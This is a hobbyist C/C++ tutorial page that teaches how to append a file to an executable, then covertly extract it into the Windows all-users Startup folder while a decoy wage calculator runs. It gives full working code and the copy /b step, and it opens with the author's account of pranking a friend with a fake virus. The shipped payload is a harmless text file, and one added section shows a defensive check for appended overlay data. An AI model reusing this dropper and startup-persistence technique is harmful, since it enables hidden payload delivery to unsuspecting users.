OldSchoolCode.com

Embedding
At some point in learning I wanted to be mischievous for fun. I was thinking, what if I could deploy a program from a program without the user knowing :) I wrote a fun little program asking the user (a friend) for some information, and while he was working on it I deployed a fake virus program into his Startup folder. The next day when he started up his computer the fake virus program ran, saying a virus was found and to press the OK button to remove it. When the OK button was pressed a bunch of lines popped up notifying him that all the files on his computer were being erased. Of course they were not, but it was good fun. For the app below we will be less mischievous and simply deploy a .txt file to the Startup folder to show up on the next boot :) You can be more creative if you choose. Use your powers for good ;)

Here is the high level...

We are going to append the startup.txt file to the end of your program (we'll call it misleading.exe). Then when the user runs misleading.exe, it will seek to the starting point of startup.txt inside misleading.exe and copy that data out into its own file.

OK, so first we're going to concentrate on writing the part of the program that copies the file startup.txt (embedded at the end of your exe) to the destination folder. The plan of attack is to use fopen to open up the exe, assume your file is embedded at the very end of it, and seek backwards from the end of the file by exactly the size of startup.txt so that we land on its first byte.

Create a .txt file and name it startup.txt. Type something funny in it.

Next, right click startup.txt, choose Properties and look at the total size in bytes. It will say Size: xxxKB ( xxx,xxx bytes ). Write down the exact byte count (not the rounded KB value); this is how big the file is, and it is the number the program will seek back by.

In the new program you are writing, use fopen to open the program itself. For instance, if it's called misleading.exe, you can do fopen( "misleading.exe", "rb" ). The "rb" matters: the exe is a binary file, so it must be opened in binary mode.

The next thing we want to do is seek to the end of misleading.exe and then back up by the size of startup.txt. The new function you will now learn is fseek. It lets you move around a file while it is open.
fseek( filePointer, amount to seek, place to seek from );
"place to seek from" can be one of 3 things:
SEEK_SET //start seeking from the beginning of the file
SEEK_CUR //seek from wherever we currently are in the file
SEEK_END //seek from the end of the file
SEEK_END is what we want to use. Let's say you have already opened the file; we want to seek back the number of bytes your startup.txt file is. Let's say your file is 10,000 bytes. We would do
fseek( pFile, -10000, SEEK_END );
This tells the program to go to the end of the executable and then back up 10,000 bytes. This way, when we embed the startup.txt file at the end of your exe, running fseek will put us exactly where the startup.txt file starts. The offset is negative because we are counting backwards from the end; if the number is off by even one byte you will copy out the wrong data.

The next step is to copy startup.txt out of misleading.exe. To do that we need to make a buffer big enough to hold startup.txt in RAM. We will then read the appended startup.txt into RAM and save it out into its own file. Did that make a little bit of sense?

We are working with a small text file here, but chances are you will use a much bigger .exe, so let's learn about a buffer :)

A buffer is an array of bytes in memory that you use to hold whatever values you want. Remember, to the computer everything is just values in memory addresses; it doesn't matter what those values are. It is common to make a buffer with unsigned chars, also called BYTEs. However, it could be created with any data type. We are going to use an array of unsigned chars for our buffer.

Dynamic memory allocation...

Now, let's say that startup.txt is 364,544 bytes (or unsigned chars). You could make your buffer like this: unsigned char buffer[ 364544 ]; The only problem with this is that it's way too much memory to ask for all at once when the program starts. Here is why: any variable you declare inside a function (like main) gets put on something called "the stack". The stack has to be large enough to hold every variable in a function, and normally it only holds a few ints, floats, etc. If your buffer is an array 364,544 bytes long, that is pretty large for the stack. Instead, we're going to ask Windows for the memory. When we do this, Windows gives us a pointer to some free RAM. We use the "new" command for that.
unsigned char *pBuffer = new unsigned char[ 364544 ];
This is telling Windows we want a new array of unsigned chars that is 364,544 unsigned chars long. Windows will find available memory and assign it to our pBuffer pointer. I hope this made sense.

Now that your buffer has been allocated, you want to use fread to read from the point you are currently at in the file, for exactly the number of bytes your startup.txt file is, into the pBuffer array you allocated from Windows.

Once you have made it here, your startup.txt file is in RAM, beginning at the address pBuffer points to. You can now close the file that was opened with fopen, because we have the startup.txt file in memory.

The next step is to open a new file for writing ("wb") and write the file (startup.txt) to it using fwrite. For our purposes, we want to open a file for writing in the user's Startup folder and call it startup.txt. For example (XP-era path shown):
FILE *pFile = fopen( "C:\\Documents and Settings\\Coder\\Start Menu\\Programs\\Startup\\startup.txt", "wb" );
When you're done writing, be sure to close the file!

After the file has been written we want to tell Windows we are done with the memory it gave us for pBuffer. We do this by using the delete call:
delete [] pBuffer;
This tells Windows to free all the memory associated with the array of bytes it gave us at the pBuffer address.

Compile the program BUT DON'T RUN IT !!

After writing this, you still can't run the program because we haven't appended startup.txt to the end of it. Here is that last step... take your program misleading.exe and startup.txt and place them in the same directory. Then navigate to that directory through the command prompt. Once you are in the directory, type this...
copy /b misleading.exe+startup.txt misleading.exe
This uses DOS's copy command in binary mode (/b) to append startup.txt to the end of your new program "misleading.exe". After you do that, any time you run misleading.exe it will extract startup.txt and place it in the Startup folder :)
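What copy /b leaves behind is data sitting after the last PE section, known as the overlay, and that is exactly what scanners and forensic tools look for when hunting files embedded this way. As an added example that is not part of this page, here is a small overlay check in C: it parses the section table and reports how many trailing bytes exist. It is exercised on a PE skeleton constructed inline (not a real exe), and the function names are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* PE headers are little-endian on disk no matter what the host is. */
static uint32_t rd32(const unsigned char *p)
{ return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24); }
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Bytes after the last section's raw data (the overlay): 0 means none,
   -1 means the buffer is not a well-formed PE or a section runs past EOF. */
long pe_overlay_size(const unsigned char *buf, size_t len)
{
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return -1;
    uint32_t pe = rd32(buf + 0x3C);                    /* e_lfanew */
    if (pe > len || len - pe < 24 || memcmp(buf + pe, "PE\0\0", 4) != 0) return -1;
    uint16_t nsec  = rd16(buf + pe + 6);               /* NumberOfSections */
    uint16_t optsz = rd16(buf + pe + 20);              /* SizeOfOptionalHeader */
    size_t sh = (size_t)pe + 24 + optsz;               /* first section header */
    if (nsec == 0 || sh > len || (len - sh) / 40 < nsec) return -1;
    uint64_t end = 0;
    for (uint16_t i = 0; i < nsec; i++) {
        const unsigned char *s = buf + sh + (size_t)i * 40;
        uint64_t e = (uint64_t)rd32(s + 20) + rd32(s + 16); /* PointerToRawData + SizeOfRawData */
        if (e > end) end = e;
    }
    return end > len ? -1 : (long)(len - end);
}

/* Constructed sample: a minimal MZ/PE skeleton with one 16-byte section,
   optionally followed by the 8-byte "SURPRISE" overlay that copy /b creates. */
size_t build_sample(unsigned char *out, int with_overlay)
{
    memset(out, 0, 0x98);
    out[0] = 'M'; out[1] = 'Z'; out[0x3C] = 0x40;   /* e_lfanew: PE signature at 0x40 */
    memcpy(out + 0x40, "PE\0\0", 4);
    out[0x46] = 1;                    /* NumberOfSections = 1, SizeOfOptionalHeader stays 0 */
    out[0x68] = 0x10;                 /* SizeOfRawData = 16 (section header starts at 0x58) */
    out[0x6C] = 0x80;                 /* PointerToRawData = 0x80 */
    if (!with_overlay) return 0x90;
    memcpy(out + 0x90, "SURPRISE", 8);
    return 0x98;
}

/* Builds the sample and runs the check: 8 with the overlay, 0 without. */
long overlay_of_sample(int with_overlay)
{
    unsigned char buf[0x98];
    return pe_overlay_size(buf, build_sample(buf, with_overlay));
}
```

On a real binary, read the whole file into a buffer and call pe_overlay_size on it; a non-zero result is the first thing to explain before trusting the executable.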

The Startup folder path is user specific. In the code below I show you how to get the path to the Startup folder regardless of the user :)

One last thing: if you are running MS Vista you will have to use "Run as Administrator" if you have UAC enabled. Right click the .exe and select "Run as Administrator". Otherwise Vista blocks our fun.

Wow....sorry so long :)

__________________________________________________________
#define _CRT_SECURE_NO_DEPRECATE

#include <stdio.h>
#include <string.h>
#include <conio.h>
#include <stdlib.h>
#include <windows.h>
#include <shlobj.h>

//Size in bytes of the file appended to the end of misleading.exe.
//MY text file contains the word "SURPRISE" (8 bytes). Open the
//properties of the .txt (or .exe) you appended and put its exact
//byte count here; if it is wrong you will extract the wrong bytes.
const long kPayloadSize = 8;

int main(void)
{
   char path[MAX_PATH];
   char filepath[MAX_PATH + 16];
   float a, b;
   double c;

   //Open the .exe built from this .cpp (remember, this is a
   //binary file!!!). The name is relative, so run the program
   //from the directory it lives in.
   FILE *pFile = fopen("misleading.exe", "rb");
   if (pFile == NULL)
   {
      printf("Could not open misleading.exe\n");
      return 1;
   }

   //Use fseek to move the file position indicator to the spot
   //you want to access in the file. SEEK_END means count from
   //the end of the file ("bottom to top"), so -kPayloadSize
   //lands exactly on the first byte of the appended file.
   if (fseek(pFile, -kPayloadSize, SEEK_END) != 0)
   {
      printf("misleading.exe is smaller than the appended file\n");
      fclose(pFile);
      return 1;
   }

   //Allocate memory for the file to fill. The stack only holds
   //a small amount of RAM, so rather than freak out the small
   //stack we ask Windows for a larger chunk with new.
   unsigned char *pBuffer = new unsigned char[kPayloadSize];

   //Now that we are at the beginning of our file, use fread to
   //read its contents (kPayloadSize bytes) into pBuffer.
   if (fread(pBuffer, kPayloadSize, 1, pFile) != 1)
   {
      printf("Could not read the appended file\n");
      fclose(pFile);
      delete [] pBuffer;
      return 1;
   }

   //Close your file; the appended data now lives in pBuffer.
   fclose(pFile);

   //Build the destination path. F1 SHGetFolderPath and CSIDL!!
   //CSIDL_COMMON_STARTUP is the all-users Startup folder (which
   //is why Vista needs "Run as Administrator"). SHGetFolderPathA
   //is the char version, matching our char path[] buffer.
   if (FAILED(SHGetFolderPathA(NULL, CSIDL_COMMON_STARTUP, NULL,
                               SHGFP_TYPE_CURRENT, path)))
   {
      printf("Could not find the Startup folder\n");
      delete [] pBuffer;
      return 1;
   }

   //path is at most MAX_PATH chars, and filepath has 16 spare
   //bytes for "\startup.txt", so this sprintf cannot overflow.
   sprintf(filepath, "%s\\startup.txt", path);

   //Since the user may have already run the program we don't
   //need to install the file again; check whether it is there.
   pFile = fopen(filepath, "rb");
   if (pFile != NULL)
   {
      //Already installed: just close it.
      fclose(pFile);
   }
   else
   {
      //Create a new file in the Startup folder ("wb" = write, binary).
      pFile = fopen(filepath, "wb");
      if (pFile != NULL)
      {
         //Use fwrite to copy the contents of pBuffer (your file
         //in Windows memory) to the file you just created.
         fwrite(pBuffer, kPayloadSize, 1, pFile);
         fclose(pFile);
      }
      else
      {
         printf("Could not create %s\n", filepath);
      }
   }

   //Tell Windows we are done with the memory it gave us.
   delete [] pBuffer;

   //The "real" program the user actually sees.
   printf(" What is your hourly wage?:");
   scanf("%f", &a);
   printf(" How many hours per week do you work?:");
   scanf("%f", &b);
   c = a * b;
   printf(" Your weekly income is: $ %.2f\n", c);
   c = 52 * (a * b);
   printf(" Your yearly income: $ %.2f\n", c);
   c = 0.80 * (52 * a * b);
   printf(" After taxes (roughly): $ %.2f\n", c);

   _getch();

   return 0;
}